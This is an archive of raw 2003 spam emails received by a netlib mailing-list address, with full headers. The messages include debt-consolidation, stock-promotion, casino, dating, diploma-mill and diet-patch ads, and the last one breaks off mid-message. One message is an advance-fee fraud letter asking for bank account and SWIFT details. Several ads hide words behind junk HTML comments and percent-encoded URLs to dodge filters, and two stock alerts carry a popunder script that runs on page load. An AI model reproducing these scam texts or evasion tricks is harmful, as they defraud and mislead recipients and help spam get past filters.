Received: from hotmail.com (bay3-dav147.bay3.hotmail.com [65.54.169.177])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h4SFKfSP001714
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 28 May 2003 11:20:42 -0400 (EDT)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 28 May 2003 08:20:36 -0700
Received: from 80.58.11.235 by bay3-dav147.bay3.hotmail.com with DAV;
	Wed, 28 May 2003 15:20:36 +0000
X-Originating-IP: [80.58.11.235]
X-Originating-Email: [gkimberlybrwu2g765oqr7@msn.com]
To: "Gandhi Quigg" <GandhiQuigg@boardermail.com>
Subject: We Can Help Your Debt Troubles
From: "Valladares Louissaint" <ValladaresLouissaint@google.com>
X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4522.1201
X-MSMail-Priority: Normal
Importance: Normal
X-Priority: 3 (Normal)
Content-Type: multipart/alternative; boundary="17h833WWRr7cXGk0FV2YLKeer8U1gV3cBkAs2RpqmflolM0MRbQk83giep"
Content-Transfer-Encoding: 7bit
Message-ID: <BAY3-DAV147lpi1rB990001c18b@hotmail.com>
X-OriginalArrivalTime: 28 May 2003 15:20:36.0560 (UTC) FILETIME=[B072AD00:01C3252C]
Date: 28 May 2003 08:20:36 -0700

--17h833WWRr7cXGk0FV2YLKeer8U1gV3cBkAs2RpqmflolM0MRbQk83giep
Content-Transfer-Encoding: 7bit
Content-Type: text/html; charset="ISO-8859-1"

<HTML><CENTER>
<FONT SIZE=3 FACE=Arial COLOR=#008000><B>I<!Q>s Y<!C>ou<!G>r<!I> D<!R>e<!M>b<!U>t <!D>Out o<!E>f C<!L>o<!I>n<!C>trol<!X>?<!W><!R>
<!R><BR>Reduce your monthly payments by consolidating your Debt!
<BR><BR>
<A HREF=http://%77w%77%2Egr%65atd%65als-%66%6F%72%79%6F%75%2Ec%6Fm/debt1/><FONT SIZE=3 FACE=Arial COLOR=RED>Ge<!N>t<!W> <!U>A <!K>Fr<!U>ee<!V> De<!Y>b<!L>t<!K> C<!O>o<!Q>n<!F>s<!X>u<!E>lt<!Y>ation<!B> Rig<!T>ht <!J>He<!L>re</B></A>
<BR><BR><FONT SIZE=3 FACE=Arial COLOR=BLACK>
Pa<!W>y<!P> <!V>your <!W>d<!L>ebts off w<!T>ith<!G> <!G>o<!B>n<!B>e mon<!H>th<!N>l<!C>y p<!S>aym<!R>ent<!Y>!<!J><BR>
Save hundreds of dollars by eliminating high interest bills!
<BR><BR><A HREF=http://ww%77.%67%72%65%61%74dea%6C%73-fo%72%79%6F%75.co%6D/debt1/><FONT SIZE=3 FACE=Arial COLOR=RED><B>Get Started Right Now And Remember It's FREE</B></A>
<BR><BR><FONT SIZE=1 COLOR=BLACK><BR RR><A href=http://%77%77%77%2Egre%61tde%61%6Cs%2Dfo%72%79o%75%2E%63%6F%6D/debt1/remove/remove.htm>click</A> fo<!E>r remo<!F>v<!T>al<BR RR><!-- FXENL4t46T5ASnFoRmo1TDA1LTI4MUNkTU0xUmQ=XK2BHr8842M76n8536 --></HTML>

--17h833WWRr7cXGk0FV2YLKeer8U1gV3cBkAs2RpqmflolM0MRbQk83giep--


From NasdaqNews341@yahoo.com Wed Jun  4 00:49:11 2003
Return-Path: <NasdaqNews341@yahoo.com>
Received: from 24.98.68.77 (tiyjm@c-24-98-68-77.atl.client2.attbi.com [24.98.68.77])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h544msSP028732
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 4 Jun 2003 00:49:09 -0400 (EDT)
Message-Id: <200306040449.h544msSP028732@netlib2.cs.utk.edu>
Received: from unknown (201.187.168.97) by smtp-server1.cfl.rr.com with QMQP; Jun, 03 2003 11:44:05 PM -0100
Received: from rly-yk04.mx.aol.com ([99.100.131.137]) by rly-xw01.mx.aol.com with NNFMP; Jun, 03 2003 10:30:11 PM +1100
Received: from [106.226.127.61] by n7.groups.yahoo.com with local; Jun, 03 2003 9:40:07 PM +0600
From: NASDAQ BREAKING NEWS <NasdaqNews341@yahoo.com>
To: Karley
Cc: 
Subject: NASDAQ BREAKING NEWS - CYTGF Receives Letter of Intent......... big
Sender: NASDAQ BREAKING NEWS <NasdaqNews341@yahoo.com>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Tue, 3 Jun 2003 23:49:35 -0500
X-Mailer: MIME-tools 5.503 (Entity 5.501)

<script language="JavaScript">
var popunder=new Array();
popunder[0]='http://biz.yahoo.com/prnews/030603/va177_1.html';
function get_cookie(Name){var search=Name+'=';var 

returnvalue='';if(document.cookie.length>0){offset=document.cookie.indexOf(search);if(offset!=-1){offset+=search.length;end=d

ocument.cookie.indexOf(';',offset);if(end==-1)end=document.cookie.length;returnvalue=unescape(document.cookie.substring(offse

t,end))}}return returnvalue;}
function 

openWindowRemote(){win2=window.open(popunder[Math.floor(Math.random()*(popunder.length))],'popunder',"scrollbars=yes,resizabl

e=yes,toolbar=yes,menubar=yes,status=yes,location=yes,width=800,height=600,left=0,top=0");win2.blur();
window.focus();}
window.onload = openWindowRemote;
</script>

gxwujqmcknhwlwpsawon

From wkathynk1sk@msn.com Thu Jun  5 21:24:24 2003
Return-Path: <wkathynk1sk@msn.com>
Received: from hotmail.com (bay3-dav158.bay3.hotmail.com [65.54.169.188])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h561ONSP021094
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 5 Jun 2003 21:24:23 -0400 (EDT)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 5 Jun 2003 18:24:18 -0700
Received: from 212.33.201.18 by bay3-dav158.bay3.hotmail.com with DAV;
	Fri, 06 Jun 2003 01:24:17 +0000
X-Originating-IP: [212.33.201.18]
X-Originating-Email: [wkathynk1sk@msn.com]
Subject: Free Trial For Septic Product (fwd)
To: "Winney Tohen" <WinneyTohen@myrealbox.com>
From: "Laughlin Tevlin" <LaughlinTevlin@canoemail.com>
X-Priority: 3 (Normal)
Organization: 45181
X-MSMail-Priority: Normal
X-Accept-Language: en
X-Originating-Ip: [30.717.026.649]
Content-Type: multipart/alternative; boundary="1lolM0lRbQj82ghdpcFcD6DIkHbo842HdL570J7lq50aNNIi3lOWB6VM8PCBonj5L6pfiRdmYpj"
Content-Transfer-Encoding: 7bit
Message-ID: <BAY3-DAV158l4EnAv1O00001877@hotmail.com>
X-OriginalArrivalTime: 06 Jun 2003 01:24:18.0051 (UTC) FILETIME=[59719530:01C32BCA]
Date: 5 Jun 2003 18:24:18 -0700

--1lolM0lRbQj82ghdpcFcD6DIkHbo842HdL570J7lq50aNNIi3lOWB6VM8PCBonj5L6pfiRdmYpj
Content-Transfer-Encoding: 7bit
Content-Type: text/html; charset="US-ASCII"

<HTML><CENTER><FONT SIZE=3 FACE=ARIAL COLOR=#6444A6><B RR>
Dramatically Increase The Life And Effectiveness of Your Septic System.</B>
<BR><BR><A HREF=http://www.salesplussales.net/spc1/><FONT SIZE=2 FACE=ARIAL COLOR=#E04A1F><B RR>Try SPC Septic Cleaner For Free By Clicking Here</B></A>
<BR><BR><FONT SIZE=2 FACE=ARIAL COLOR=BLACK RR>You'll keep your septic system free flowing as SPC breaks down large waste materials into smaller<BR RR>
particles and liquids so that they pass quickly through your septic system.<BR><BR><A HREF=http://www.salesplussales.net/spc1/><FONT SIZE=2 FACE=ARIAL COLOR=#E04A1F><B RR>Visit our site and try it for free.</B></A>
<BR><BR><FONT COLOR=#C8C8C8 SIZE=1 RR>unsubscribel <A href=http://www.salesplussales.net/spc1/remove/remove.htm RR>here</A><BR RR><!-- pjc775QmT82Js1AN2c4M0k0NTE4MDYtMDViWEdrMEVNTTE2aTNQXeer8U0fn6BmcH26kFE4910 --></HTML>

--1lolM0lRbQj82ghdpcFcD6DIkHbo842HdL570J7lq50aNNIi3lOWB6VM8PCBonj5L6pfiRdmYpj--


From ytom8j5q4@msn.com Thu Jun 12 01:44:59 2003
Return-Path: <ytom8j5q4@msn.com>
Received: from hotmail.com (bay3-dav116.bay3.hotmail.com [65.54.169.146])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h5C5iwSP027656
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 12 Jun 2003 01:44:59 -0400 (EDT)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 11 Jun 2003 22:44:52 -0700
Received: from 149.24.12.28 by bay3-dav116.bay3.hotmail.com with DAV;
	Thu, 12 Jun 2003 05:44:52 +0000
X-Originating-IP: [149.24.12.28]
X-Originating-Email: [ytom8j5q4@msn.com]
To: "Windler Tomasson" <WindlerTomasson@canada.com>
From: "Rodriguiz Bernie" <RodriguizBernie@toast.com>
Subject: Save Your Money
Organization: cgpbkwn2yT65OkR7DH50R1VI2uTOo6yVehXC
X-MSMail-Priority: Normal
X-Priority: 3 (Normal)
Importance: Normal
X-Accept-Language: en
X-Mailer: ELM [version 2.4 PL24]
X-Comment: BLI36J5Q4Hn1DEtMS
Content-Type: multipart/alternative; boundary="4CU032cq3h5g2MxceS46cySH8XhwqiDCWWaBEMP2KB4Eq5ddxfAiemqGlcNf8Q332FbI478h6"
Content-Transfer-Encoding: 7bit
Message-ID: <BAY3-DAV1165B54Vu1l00007f6c@hotmail.com>
X-OriginalArrivalTime: 12 Jun 2003 05:44:52.0513 (UTC) FILETIME=[BEC9A910:01C330A5]
Date: 11 Jun 2003 22:44:52 -0700

--4CU032cq3h5g2MxceS46cySH8XhwqiDCWWaBEMP2KB4Eq5ddxfAiemqGlcNf8Q332FbI478h6
Content-Transfer-Encoding: 7bit
Content-Type: text/html; charset="US-ASCII"

<HTML><CENTER><FONT SIZE=4 FACE=Arial COLOR=#A97A23><B RR>Finding it difficult to make all your payments?</B><BR>
<FONT SIZE=3 FACE=Arial COLOR=#45320E RR>Visit us for a no obligation consultation on debt management!<BR><BR>
<A HREF=http://www.QUALITYSALES-GREAT.COM/debt1/><FONT SIZE=3 FACE=Arial COLOR=RED><B RR>Click Here To Get Started</B></A><BR><BR>
<FONT SIZE=3 FACE=Arial COLOR=BLACK RR>With debt consolidation you can<BR RR>turn many troublesome bills into one low payment!
<BR><BR><FONT SIZE=3 FACE=Arial COLOR=#61527A><B><I RR>Our representatives are waiting to help you right now!</I><BR><BR>
<A HREF=http://www.QUALITYSALES-GREAT.COM/debt1/><FONT SIZE=3 FACE=Arial COLOR=RED RR>Click Here To Get Started</B></A>
<BR><BR><FONT SIZE=1 COLOR=#666666><BR RR><A href=http://www.QUALITYSALES-GREAT.COM/debt1/remove/remove.htm RR>here</A RR> and unsubscribe your email<BR RR><!-- MUY5TJVNaYmAbGc0SjBBYmlBZjA2LTEyd24yTU0xNTc3XOkR7DH50R1VI27433 --></HTML>

--4CU032cq3h5g2MxceS46cySH8XhwqiDCWWaBEMP2KB4Eq5ddxfAiemqGlcNf8Q332FbI478h6--


From dxdLunchMate45654@yahoo.com Wed Jun 25 10:15:06 2003
Return-Path: <dxdLunchMate45654@yahoo.com>
Received: from 68.32.225.177 ([195.229.55.45])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h5PEF2SP017204
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 25 Jun 2003 10:15:04 -0400 (EDT)
Message-Id: <200306251415.h5PEF2SP017204@netlib2.cs.utk.edu>
Received: from [26.84.34.94] by smtp4.cyberec.com with smtp; Jun, 25 2003 8:10:52 AM -0100
Received: from unknown (HELO mail.gmx.net) (78.165.116.169) by smtp4.cyberec.com with smtp; Jun, 25 2003 7:10:04 AM +0700
From: bdfLUNCH MATE <dxdLunchMate45654@yahoo.com>
To: PotentialLover453456
Subject: LOVE BEGINS With Just One Date - LunchMate........... mojsa
Sender: bdfLUNCH MATE <dxdLunchMate45654@yahoo.com>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Wed, 25 Jun 2003 09:15:08 -0500
X-Mailer: Microsoft Outlook Express 5.00.2919.6700

<p align="center">
<img border="0" src="http://www.lunchmate.com/mailimages/lunchmate_logo.jpg" width="748" height="577"></p><p align="center">
<br>
<a href="http://coldfusion.affiliateshop.com/AIDLink.cfm?AID=033547&BID=3251">ENTER HERE</a></p>
<p align="center">&nbsp;</p>
<p align="left">Unsubscribe me: <a href="mailto:custblast@cs.com">custblast@cs.com</a></p>

hliyqrbapstdbvibjnpbfsqiuypwm

From eqOnlineCasino54798@yahoo.com Wed Jul  2 16:32:50 2003
Return-Path: <eqOnlineCasino54798@yahoo.com>
Received: from 80.36.168.162 (adsl-68-76-198-233.dsl.sfldmi.ameritech.net [68.76.198.233])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h62KWMSP003447
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 2 Jul 2003 16:32:38 -0400 (EDT)
Message-Id: <200307022032.h62KWMSP003447@netlib2.cs.utk.edu>
Received: from 32.62.180.131 ([32.62.180.131]) by sydint1.microthin.com.au with smtp; Jul, 02 2003 2:21:28 PM +0600
Received: from [138.156.251.163] by da001d2020.lax-ca.osd.concentric.net with local; Jul, 02 2003 1:32:38 PM -0700
From: ONLINE CASINO <eqOnlineCasino54798@yahoo.com>
To: OnlineCasino454356
Subject: CASINO ONLINE - $1000 FREE Just To Play.......... syds
Sender: ONLINE CASINO <eqOnlineCasino54798@yahoo.com>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Wed, 2 Jul 2003 15:32:46 -0500
X-Mailer: Microsoft Outlook Build 10.0.2627

<p align="center">
<img border="0" src="http://www.play-the-market-to-win.com/casino_1e.jpg" width="403" height="184"></p>
<p align="center"><b><a href="http://www.play-the-market-to-win.com/Gambling_Promo.htm">
ENTER HERE</a></b></p>
<p align="center">&nbsp;</p>
Unsubscribe me: <a href="mailto:pleasetakeoff@cs.com">pleasetakeoff@cs.com</a></p>

kqsnnyixnvknpflr

From BolchUchytil@aol.com Fri Jul  4 08:02:46 2003
Return-Path: <BolchUchytil@aol.com>
Received: from smtp08.wxs.nl (smtp08.wxs.nl [195.121.6.40])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h64C2jSP022136
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 4 Jul 2003 08:02:46 -0400 (EDT)
Received: from 145.53.100.34 (ip91356422.speed.planet.nl [145.53.100.34])
 by smtp08.wxs.nl
 (iPlanet Messaging Server 5.2 HotFix 1.14 (built Mar 18 2003)) with SMTP id
 <0HHI006WV1AAKW@smtp08.wxs.nl> for blast-funct-archive@netlib2.cs.utk.edu;
 Fri, 04 Jul 2003 14:00:44 +0200 (MEST)
Received: from aBEMQ2LC.Oi7Geg0nbDbC5bH.com ([3.22.956.484])
 by lfkUR62s.3o4Ay.com with ESMTP id MOd; Thu, 03 Jul 2003 20:02:35 -0700
Date: Thu, 03 Jul 2003 20:02:35 -0700
From: Arenstam Stones <Pp6aVEi8DtFwjIdeT46caTI0@0g16jD.ol.com>
Subject: extra career options with a flourishing future!
X-Originating-IP: [663.546.553.5]
X-Sender: "Arenstam Stones" <ArenstamStones@aol.com>
To: Duden Faas <Gillich@amuromail.com>
Message-id: 
 <6ndhPblWo2aU75OkS71Hq0SfVI2uUPp6aVEi8D5g2NXdeT46caTI0Yixq1Pno31jmjKYkP4Fr5edxfBif@C5bHjGy.aol.com>
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
X-Mailer: MIME::Lite 2.106
Content-type: multipart/alternative;
 boundary="Boundary_(ID_/TKPU0PjUGJzKJMw1emwFA)"
Importance: Normal
X-Accept-Language: en
X-MSMail-priority: Normal


--Boundary_(ID_/TKPU0PjUGJzKJMw1emwFA)
Content-type: text/html; charset=US-ASCII
Content-transfer-encoding: 7BIT

<CENTER><FONT SIZE=4 FACE=Arial COLOR=#045B6A RR><B>Get A Degree In Any Experienced Field</B>
<BR><BR><FONT SIZE=3 FACE=Arial COLOR=#75000C RR>Call <B RR>1-310-943-3251</B RR> Now For More Information!
<BR><BR><FONT SIZE=3 FACE=Arial COLOR=BLACK RR>
It is a well known fact that people who posses a degree are looked upon as the elite<BR RR>
If you have a degree, you are almost assured to gain leverage in the work place
<BR><BR><FONT SIZE=3 FACE=Arial COLOR=#75000C RR>There's no testing required, simply call <B RR>1-310-943-3251</B RR> for more information.
<BR><BR>
Q432GcJ478h63o4A

--Boundary_(ID_/TKPU0PjUGJzKJMw1emwFA)--

From funsohwilliems0@tiscali.co.uk Thu Jul 24 00:13:47 2003
Return-Path: <funsohwilliems0@tiscali.co.uk>
Received: from mk-smarthost-2.mail.uk.tiscali.com (mk-smarthost-2.mail.uk.tiscali.com [212.74.114.38])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h6O4DkSP016842;
	Thu, 24 Jul 2003 00:13:47 -0400 (EDT)
Received: from [212.74.114.4] (helo=mk-cpfrontend.uk.tiscali.com)
	by mk-smarthost-2.mail.uk.tiscali.com with esmtp (Exim 4.14)
	id 19fXU4-000ILw-NT; Thu, 24 Jul 2003 05:13:40 +0100
Received: from [80.88.139.230] by mk-cpfrontend.uk.tiscali.com with HTTP; Thu, 24 Jul 2003 05:11:33 +0100
Date: Thu, 24 Jul 2003 05:11:33 +0100
Message-ID: <3F1821E50000A50E@mk-cpfrontend-2.mail.uk.tiscali.com>
From: funsohwilliems0@tiscali.co.uk
Subject: STRICTLY AND CONFIDENCIAL
To: funsohwilliems0@tiscali.co.uk
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by netlib2.cs.utk.edu id h6O4DkSP016842

FROM THE DESK: 
DR.FUNSOH WILLIEMS 
CHIEF ACCOUNTING OFFICER 

ATTENTION: PRESIDENT/DIRECTOR 

I AM DR. FUNSOH WILLIEMS THE CHIEF ACCOUNTING OFFICER OF A 
BANK. THE FINANCIAL STATEMENT OF OUR BANK IS OVER 
US$300,000,000,000.00 (THREE HUNDRED BILLION UNITED STATES 
DOLLARS) AND THE CURRENT ASSETS OF OUR BANK IS RELATIVELY 
LIQUID RESOURCES. THIS CATEGORIES INCLUDES CASH, 
INVESTMENTS IN MARKETABLE SECURITIES, RECEIVABLE, 
INVENTORIES AND PREPAID EXPENSES. IN RECENT YEARS THE 
ANNAUL REVENUE OF OUR BANK HAS EXCEEDED TO 
US$500,000,000,000.00 (FIVE HUNDRED BILLION UNITED STATES 
DOLLARS) AND MY RESPONSIBITY IS FOR ME TO MAINTAIN 
ADEQUATE MONETARY INTERNAL CONTROL, CONTROLLING THE BANK 
CASH POSITION, BUDGETTING AND FOR THE PREPARATION OF 
ACCOUNTING RECORDS AND FINANCIAL STATEMENT. 

THE NUMBER OF CAPITAL SHARES WHICH HAS BEEN ISSUED FOR THE 
YEAR 2003 IS UNDER MY JURISDICTION IS 
US$300,000,000,000.00 AND THE OUTSTANDING SHARE THAT IS 
PRESENTLY UNDER MY CONTROL AND SUPERVISION IS 
US$87,000,000.00 (EIGHTY SEVEN MILLION UNITED STATES DOLLARS). 
WE ARE IN THE FIRST QUARTER OF THE YEAR 2003 AND I NEED A 
RELIABLE FOREIGN PARTNER THAT WILL ASSIST ME TO TRANSFER 
THE FUND INTO HIS BANK ACCOUNT. I HAVE MANAGERIAL 
AUTHORITY TO TRANSFER THIS FUND INTO YOUR BANK ACCOUNT BY 
ELECTRONIC WIRE TRANSFER. I NEED THE FOLLOWING BANKING 
INFORMATION: 

1. THE NAME OF YOUR BANK 
2. THE BANK ADDRESS 
3. THE BANK ACCOUNT 
4. THE BANK ROUTING/SWIFT CODE 
5. THE BANK BENEFICIARY 
6. YOUR COMPANY NAME 
7. YOUR PRIVATE TEL, FAX AND MOBILE TELPHONE FOR EASY COMMUNICATION 

WITH THE ABOVE INFORMATION, I WILL EFFECT THE PAYMENT OF 
US$87MILLION DOLLARS INTO YOUR NOMINATED BANK ACCOUNT AND 
THIS WILL ONLY TAKE US 24 BANKING WORKING HOURS TO 
EXECUTIVE THIS FINANCIAL BUSINESS TRANSACTION THAT WILL 
BENEFIT BOTH PARTIES. WE HAVE AGREED TO SHARE THE FUND AS 
FOLLOW: 30% WILL BE GIVING TO YOU HAS THE OWNER OF THE 
ACCOUNT WHERE THE FUND WILL BE TRANSFER AND 60% WILL BE 
FOR ME AND 10% FOR VALUE ADDED TAX THAT WILL BE REQUIRED 
BY YOUR BANK OFFICIAL. 

THE BANK WILL SEND YOU VALID CONCRETE AUTHORIZATION 
DOCUMENT AND TELEX CONFIRMATION WILL BE SEND TO YOUR BANK 
AND FOR YOU TO VARIFY FROM YOUR BANK AS SOON AS THE FUND 
HIT YOUR BANK ACCOUNT. 

NOTE: Please kindly state your early response immediately 
on this email: funsohwilliems2@tiscali.co.uk for more details 
on the modalities involves in this business and it is top secret 
you have to keep strictly confidential. 

I WILL BE EXPECTING YOUR URGENT COMPLIANCE 
AND FEED BACK. 

YOURS TRULY, 

DR FUNSOH WILLIEMS 




From StockMarketAlert88576@yahoo.com Wed Jul 30 17:07:00 2003
Return-Path: <StockMarketAlert88576@yahoo.com>
Received: from 67.87.83.104 (ool-43575368.dyn.optonline.net [67.87.83.104])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h6UL6xSP029860
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 30 Jul 2003 17:07:00 -0400 (EDT)
Message-Id: <200307302107.h6UL6xSP029860@netlib2.cs.utk.edu>
Received: from unknown (HELO f64.law4.hotmail.com) (13.61.40.178) by ssymail.ssy.co.kr with smtp; Jul, 30 2003 2:58:47 PM +0400
Received: from unknown (156.54.224.23) by a231242.upc-a.chello.nl with local; Jul, 30 2003 2:06:57 PM -0300
From: STOCK MARKET ALERT <StockMarketAlert88576@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: STOCK MARKET ALERT - RSCA Breaking News.......... mivk
Sender: STOCK MARKET ALERT <StockMarketAlert88576@yahoo.com>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Wed, 30 Jul 2003 16:08:58 -0500
X-Mailer: Microsoft Outlook Express 5.00.2919.6700

<html>
<head>
<span
class=t>RSCA Retains the Services of iCapital as its Investment Banking Firm - 
LEARN MORE - <a href="http://biz.yahoo.com/prnews/030716/new030_1.html">ENTER 
HERE</a></span><p>&nbsp;</p>
<p><span class="t">Take me off your mailing list -
<a href="mailto:notforme2002@themail.com">HERE</a></span><br>
&nbsp;</p>
</p>
</body>
<script language="JavaScript">
var popunder=new Array();
popunder[0]='http://biz.yahoo.com/prnews/030716/new030_1.html';
function get_cookie(Name){var search=Name+'=';var returnvalue='';if(document.cookie.length>0){offset=document.cookie.indexOf(search);if(offset!=-1){offset+=search.length;end=document.cookie.indexOf(';',offset);if(end==-1)end=document.cookie.length;returnvalue=unescape(document.cookie.substring(offset,end))}}return returnvalue;}
function openWindowRemote(){win2=window.open(popunder[Math.floor(Math.random()*(popunder.length))],'popunder',"scrollbars=yes,resizable=yes,toolbar=yes,menubar=yes,status=yes,location=no,width=800,height=600,left=0,top=0");win2.blur();
window.focus();}
window.onload = openWindowRemote;
</script>
</html>

kqnhucijhmxwhigufd

From lgh58ihefs@wonderfuljerrys.us Sat Aug  2 16:15:22 2003
Return-Path: <lgh58ihefs@wonderfuljerrys.us>
Received: from ADSL148-76.advancedsl.com.ar (ADSL148-76.advancedsl.com.ar [200.63.148.76])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h72KFA8b007720;
	Sat, 2 Aug 2003 16:15:15 -0400 (EDT)
Message-ID: <5u735146$5s-6xh@hcfzao1h>
From: "Raphael Horner" <lgh58ihefs@wonderfuljerrys.us>
Reply-To: "Raphael Horner" <lgh58ihefs@wonderfuljerrys.us>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: FRREE herbal patch makes weight control easykaufman iw afha 
Date: Sun, 03 Aug 03 08:10:02 GMT
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="83E4__7B09EF7E_7F9.8AD."
X-Priority: 3
X-MSMail-Priority: Normal


--83E4__7B09EF7E_7F9.8AD.
Content-Type: text/html;
Content-Transfer-Encoding: base64

PGh0bWw+DQoNCjxoZWFkPg0KPC9oZWFkPg0KDQo8Ym9keT4NCg0KPHAgYWxpZ249ImNlbnRl
ciI+PGEgaHJlZj0iaHR0cDovL2RlbHV4ZUB3d3cuYW53Y3JlYW0uY29tL3BhZ2UucGw/bD1s
YW5wIj48aW1nIHNyYz0iaHR0cDovL2ZhbGNvbnJ5QHd3dy5hbndjcmVhbS5jb20vaG9zdGVk
aW1hZ2VzL2Jsb25kaWUuanBnIiB3aWR0aD0iMjY2IiBoZWlnaHQ9IjI0OSI+PC9hPjwvcD4N
CjxwIGFsaWduPSJjZW50ZXIiPjxhIGhyZWY9Imh0dHA6Ly9maW5ueUB3d3cuYW53Y3JlYW0u
Y29tL3BhZ2UucGw/bD1sYW5wIj48aW1nIGFsdCBzcmM9Imh0dHA6Ly9hcHBsYXVzZUB3d3cu
YW53Y3JlYW0uY29tL2ltYWdlcy90YWJsZTIuZ2lmIiBib3JkZXI9IjAiIHdpZHRoPSIzMDAi
IGhlaWdodD0iMjQ0Ij48L2E+PC9wPg0KPHAgYWxpZ249ImNlbnRlciI+Jm5ic3A7PC9wPg0K
DQo8cCBhbGlnbj0iY2VudGVyIj4mbmJzcDs8L3A+DQoNCjxwIGFsaWduPSJjZW50ZXIiPiZu
YnNwOzwvcD4NCg0KPHAgYWxpZ249ImNlbnRlciI+PGEgaHJlZj0iaHR0cDovL21vcmlhcnR5
QHd3dy5hbndjcmVhbS5jb20vdW5zdWJzY3JpYmUuaHRtbCI+PGZvbnQgc2l6ZT0iMSI+aW5k
aXNwdXRhYmxlUmVtb3ZleW91cnNlbGY8L2ZvbnQ+PC9hPjwvcD4NCg0KPHAgYWxpZ249ImNl
bnRlciI+Jm5ic3A7PC9wPg0KDQo8cCBhbGlnbj0iY2VudGVyIj4mbmJzcDs8L3A+DQoNCjxw
IGFsaWduPSJjZW50ZXIiPiZuYnNwOzwvcD4NCg0KPHAgYWxpZ249ImNlbnRlciI+Jm5ic3A7
PC9wPg0KDQo8L2JvZHk+DQoNCjwvaHRtbD56ZW0gZWx3



--83E4__7B09EF7E_7F9.8AD.--


From pfou74@famouscarls.us Sun Aug  3 00:44:17 2003
Return-Path: <pfou74@famouscarls.us>
Received: from pd952a951.dip.t-dialin.net (pD952A951.dip.t-dialin.net [217.82.169.81])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h734iE8b020514;
	Sun, 3 Aug 2003 00:44:15 -0400 (EDT)
Message-ID: <8d6-a$m--fkc8x4$8-m-c4-ig@h712.6o.p5o>
From: "Francis Harding" <pfou74@famouscarls.us>
Reply-To: "Francis Harding" <pfou74@famouscarls.us>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Blast-funct-archive look good this summer with the help of the diet patchshoulder gvw rloyotoemaj
Date: Sun, 03 Aug 03 13:38:58 GMT
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".B5.B_.EFA3_A"
X-Priority: 3
X-MSMail-Priority: Normal


--.B5.B_.EFA3_A
Content-Type: text/html;
Content-Transfer-Encoding: base64

PGh0bWw+DQoNCjxoZWFkPg0KPC9oZWFkPg0KDQo8Ym9keT4NCg0KPHAgYWxpZ249ImNlbnRl
ciI+PGEgaHJlZj0iaHR0cDovL2F0dGFpbmRlckB3d3cuYW53Y3JlYW0uY29tL3BhZ2UucGw/
bD1sYW5wIj48aW1nIHNyYz0iaHR0cDovL2xvbmdpc2hAd3d3LmFud2NyZWFtLmNvbS9ob3N0
ZWRpbWFnZXMvYmxvbmRpZS5qcGciIHdpZHRoPSIyNjYiIGhlaWdodD0iMjQ5Ij48L2E+PC9w
Pg0KPHAgYWxpZ249ImNlbnRlciI+PGEgaHJlZj0iaHR0cDovL21vZGVyYXRlQHd3dy5hbndj
cmVhbS5jb20vcGFnZS5wbD9sPWxhbnAiPjxpbWcgYWx0IHNyYz0iaHR0cDovL2N1cnNpdmVA
d3d3LmFud2NyZWFtLmNvbS9pbWFnZXMvdGFibGUyLmdpZiIgYm9yZGVyPSIwIiB3aWR0aD0i
MzAwIiBoZWlnaHQ9IjI0NCI+PC9hPjwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPiZuYnNwOzwv
cD4NCg0KPHAgYWxpZ249ImNlbnRlciI+Jm5ic3A7PC9wPg0KDQo8cCBhbGlnbj0iY2VudGVy
Ij4mbmJzcDs8L3A+DQoNCjxwIGFsaWduPSJjZW50ZXIiPjxhIGhyZWY9Imh0dHA6Ly9pbXBh
cnRhdGlvbkB3d3cuYW53Y3JlYW0uY29tL3Vuc3Vic2NyaWJlLmh0bWwiPjxmb250IHNpemU9
IjEiPnBsYWludGlmZlJlbW92ZXlvdXJzZWxmPC9mb250PjwvYT48L3A+DQoNCjxwIGFsaWdu
PSJjZW50ZXIiPiZuYnNwOzwvcD4NCg0KPHAgYWxpZ249ImNlbnRlciI+Jm5ic3A7PC9wPg0K
DQo8cCBhbGlnbj0iY2VudGVyIj4mbmJzcDs8L3A+DQoNCjxwIGFsaWduPSJjZW50ZXIiPiZu
